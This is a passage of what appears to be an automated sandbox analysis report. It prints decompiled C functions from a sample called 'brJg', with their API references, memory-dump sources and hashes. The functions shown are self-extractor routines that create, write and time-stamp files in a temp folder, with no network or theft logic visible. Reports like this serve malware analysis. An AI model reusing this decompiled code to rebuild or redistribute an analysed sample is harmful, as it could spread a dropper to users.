                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xf891e4;
                                                                        						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00F8476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00F84980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00F847E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xf893f4 =  *0xf893f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xf891e4;
                                                                        						_t63 = 0xf891e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xf891e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xf891e4;
                                                                        						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00F84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00F84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00F84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}































                                                                        0x00f84cd0
                                                                        0x00f84cdb
                                                                        0x00f84ce0
                                                                        0x00f84ce2
                                                                        0x00f84cee
                                                                        0x00f84cf2
                                                                        0x00f84d0e
                                                                        0x00f84d0e
                                                                        0x00f84d11
                                                                        0x00f84e83
                                                                        0x00f84e88
                                                                        0x00f84e98
                                                                        0x00f84e98
                                                                        0x00f84d17
                                                                        0x00f84d17
                                                                        0x00f84d1a
                                                                        0x00f84d2f
                                                                        0x00f84d2f
                                                                        0x00000000
                                                                        0x00f84d2f
                                                                        0x00f84d1c
                                                                        0x00f84d1c
                                                                        0x00f84d1f
                                                                        0x00f84dcb
                                                                        0x00f84dd0
                                                                        0x00f84dd2
                                                                        0x00f84ddd
                                                                        0x00f84ddd
                                                                        0x00f84de3
                                                                        0x00f84de8
                                                                        0x00f84ded
                                                                        0x00f84ded
                                                                        0x00f84def
                                                                        0x00f84df0
                                                                        0x00f84df0
                                                                        0x00f84df4
                                                                        0x00f84df4
                                                                        0x00f84df6
                                                                        0x00f84df9
                                                                        0x00f84dfc
                                                                        0x00f84dfc
                                                                        0x00f84dfe
                                                                        0x00f84dff
                                                                        0x00f84dff
                                                                        0x00f84e03
                                                                        0x00f84e08
                                                                        0x00f84e0a
                                                                        0x00f84e0f
                                                                        0x00f84d03
                                                                        0x00f84d03
                                                                        0x00000000
                                                                        0x00f84d03
                                                                        0x00f84e18
                                                                        0x00f84e20
                                                                        0x00f84e25
                                                                        0x00f84e27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84e33
                                                                        0x00f84e38
                                                                        0x00f84e3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84e40
                                                                        0x00f84e51
                                                                        0x00f84e56
                                                                        0x00f84e5b
                                                                        0x00f84e5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84e6a
                                                                        0x00f84e6f
                                                                        0x00f84e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84e77
                                                                        0x00f84e7d
                                                                        0x00000000
                                                                        0x00f84e7d
                                                                        0x00f84d25
                                                                        0x00f84d25
                                                                        0x00f84d28
                                                                        0x00f84d36
                                                                        0x00f84d3b
                                                                        0x00f84d40
                                                                        0x00f84d40
                                                                        0x00f84d42
                                                                        0x00f84d43
                                                                        0x00f84d43
                                                                        0x00f84d47
                                                                        0x00f84d4a
                                                                        0x00f84d4a
                                                                        0x00f84d4c
                                                                        0x00f84d4f
                                                                        0x00f84d4f
                                                                        0x00f84d51
                                                                        0x00f84d52
                                                                        0x00f84d52
                                                                        0x00f84d56
                                                                        0x00f84d5b
                                                                        0x00f84d5d
                                                                        0x00f84d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84d67
                                                                        0x00f84d6f
                                                                        0x00f84d74
                                                                        0x00f84d76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84d7c
                                                                        0x00f84d84
                                                                        0x00f84d89
                                                                        0x00f84d8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84d94
                                                                        0x00f84d99
                                                                        0x00f84d9e
                                                                        0x00f84da1
                                                                        0x00f84daa
                                                                        0x00f84daa
                                                                        0x00f84da3
                                                                        0x00f84da3
                                                                        0x00f84da3
                                                                        0x00f84db5
                                                                        0x00f84dbb
                                                                        0x00f84dbd
                                                                        0x00000000
                                                                        0x00f84dc3
                                                                        0x00f84dc5
                                                                        0x00000000
                                                                        0x00f84dc5
                                                                        0x00f84dbd
                                                                        0x00f84d2a
                                                                        0x00f84d2a
                                                                        0x00f84d2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84d2d
                                                                        0x00f84cf8
                                                                        0x00f84cfd
                                                                        0x00f84d02
                                                                        0x00000000

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F84DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F84DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 3625706803-3217841213
                                                                        • Opcode ID: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                        • Instruction ID: 766fdcfe5aba5d4932fec2f4807479affe6b93ece791b8edbcd2169f37f7fd84
                                                                        • Opcode Fuzzy Hash: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                        • Instruction Fuzzy Hash: 1241F337A041079BCF25BF28DD486F973A5EB45320F084669E88297285DA35FE4AF750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xf88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xf88d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}








                                                                        0x00f84c40
                                                                        0x00f84c4a
                                                                        0x00f84c8d
                                                                        0x00000000
                                                                        0x00f84c70
                                                                        0x00f84c70
                                                                        0x00f84c7e
                                                                        0x00f84c86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f84c8a

                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F84C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F84C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F84C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                        • Instruction ID: 35dd3069a43dfde606291448e465da8e6c913a1a7a62e06b04a6584ebb1aabce
                                                                        • Opcode Fuzzy Hash: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                        • Instruction Fuzzy Hash: 0FF03072A0120EAFAB25EFB5CC49DFB77ADEB05250B44452BB915C1051EA30E914FBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F8487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E00F8490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}







                                                                        0x00f84880
                                                                        0x00f8488c
                                                                        0x00f84894
                                                                        0x00f848a0
                                                                        0x00f848c9
                                                                        0x00f848ce
                                                                        0x00f848a2
                                                                        0x00f848a8
                                                                        0x00f848b7
                                                                        0x00f848bc
                                                                        0x00f848aa
                                                                        0x00f848ac
                                                                        0x00f848ac
                                                                        0x00f848a8
                                                                        0x00f848de
                                                                        0x00f848e7
                                                                        0x00f8490b
                                                                        0x00f848ee
                                                                        0x00f848f0
                                                                        0x00000000
                                                                        0x00f84902

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00F84A23,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F848DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00F84F67,*MEMCAB,00008000,00000180), ref: 00F84902
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                        • Instruction ID: 75ed903f5eb3362a487a4d0e5458f13746432ed4c5b363cfd67eb3b2fbf019e4
                                                                        • Opcode Fuzzy Hash: e395279ecb79f1d68940f25edc77cb73ac7cd409f17a0b2355c01bcbe6eef66d
                                                                        • Instruction Fuzzy Hash: 6C014BA3E1257526F724A0294C88FF7555CCB96734F1B0335FDAAE71D1D664AC04A3E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F84AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0xf8858c; // 0x268
                                                                        				_t9 = E00F83680(_t20);
                                                                        				if( *0xf891d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0xf88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0xf89400; // 0x5d800
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0xf89400 = _t15;
                                                                        							if( *0xf88184 != 0) {
                                                                        								_t21 =  *0xf88584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xf893f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}











                                                                        0x00f84ad5
                                                                        0x00f84adb
                                                                        0x00f84ae7
                                                                        0x00f84aee
                                                                        0x00f84b05
                                                                        0x00f84b0d
                                                                        0x00f84b14
                                                                        0x00f84b1a
                                                                        0x00f84b1c
                                                                        0x00f84b21
                                                                        0x00f84b2a
                                                                        0x00f84b2f
                                                                        0x00f84b31
                                                                        0x00f84b39
                                                                        0x00f84b54
                                                                        0x00f84b54
                                                                        0x00f84b39
                                                                        0x00f84b2f
                                                                        0x00f84b0f
                                                                        0x00f84b0f
                                                                        0x00f84b0f
                                                                        0x00f84b5e
                                                                        0x00f84ae9
                                                                        0x00f84aed
                                                                        0x00f84aed

                                                                        APIs
                                                                          • Part of subcall function 00F83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                          • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                          • Part of subcall function 00F83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00F84B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                        • Instruction ID: 0189e0df423eecc880a8cf2ceb0677014a3b07264e24c7e85c593ac3b8b22216
                                                                        • Opcode Fuzzy Hash: 7753826566daa48207e258a031364ebc963c61091691f191a32ea56db4471ee4
                                                                        • Instruction Fuzzy Hash: 1D018C3164020AABDB14AF68DC05BF27759FB84735F098225F9399B1E1CB70E812EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F8658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xf88b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xf88b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00F816B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}












                                                                        0x00f86592
                                                                        0x00f86594
                                                                        0x00f86596
                                                                        0x00f86598
                                                                        0x00f86598
                                                                        0x00f8659b
                                                                        0x00f8659b
                                                                        0x00f8659d
                                                                        0x00f8659e
                                                                        0x00f865a2
                                                                        0x00f865a4
                                                                        0x00f865a9
                                                                        0x00f865b2
                                                                        0x00f865b6
                                                                        0x00f865ba
                                                                        0x00f865c3
                                                                        0x00f865c5
                                                                        0x00f865c8
                                                                        0x00f865c8
                                                                        0x00f865c3
                                                                        0x00f865c9
                                                                        0x00f865cc
                                                                        0x00f865d2
                                                                        0x00f865d1
                                                                        0x00f865d1
                                                                        0x00000000
                                                                        0x00f865dc
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(00F88B3E,00F88B3F,00000001,00F88B3E,-00000003,?,00F860EC,00F81140,?), ref: 00F865BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                        • Instruction ID: c6337546023b03c89c79c784f38b635b51d11465c4c9719c5a25ade792e98a6b
                                                                        • Opcode Fuzzy Hash: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                        • Instruction Fuzzy Hash: F1F04C335042509BD331291D9884BF6BFDEDB86360F2C016EF8DACB205DA658C46A3A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F8621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00F8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00F844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00F86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}











                                                                        0x00f86229
                                                                        0x00f86230
                                                                        0x00f86247
                                                                        0x00f8626a
                                                                        0x00f86272
                                                                        0x00f86249
                                                                        0x00f86255
                                                                        0x00f8625f
                                                                        0x00f86264
                                                                        0x00f86264
                                                                        0x00f86284

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F8623F
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                        • Instruction ID: 48bf8b38bb1ee1e9294c63d40cfbfc9435cea2e0aa12b4b58f00933a0f441f48
                                                                        • Opcode Fuzzy Hash: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                        • Instruction Fuzzy Hash: 1EF082B1744208ABEB50FF749D06FFE77ACDB54700F4004AAB986DA191ED789D44A750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xf88d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xf88d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xf88d6c)) = 0;
                                                                        				return 0;
                                                                        			}





                                                                        0x00f84b66
                                                                        0x00f84b74
                                                                        0x00f84b98
                                                                        0x00f84ba0
                                                                        0x00000000
                                                                        0x00f84bac
                                                                        0x00f84ba4
                                                                        0x00000000
                                                                        0x00f84ba4
                                                                        0x00f84b78
                                                                        0x00f84b7e
                                                                        0x00f84b84
                                                                        0x00f84b8a
                                                                        0x00000000

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F84FA1,00000000), ref: 00F84B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                        • Instruction ID: 65394b9ebd2cb5263d3f6b7a779efc780a38a34a9a7aca0aebe99d9ce0dcf97a
                                                                        • Opcode Fuzzy Hash: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                        • Instruction Fuzzy Hash: E6F01932D40B099E8772DF79CC016D2BBE4EAD53E0350092EA46ED2191EB30A542FBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F866AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}




                                                                        0x00f866b1
                                                                        0x00f866ba
                                                                        0x00f866c7
                                                                        0x00f866bc
                                                                        0x00f866be
                                                                        0x00f866be

                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00F84777,?,00F84E38,?), ref: 00F866B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
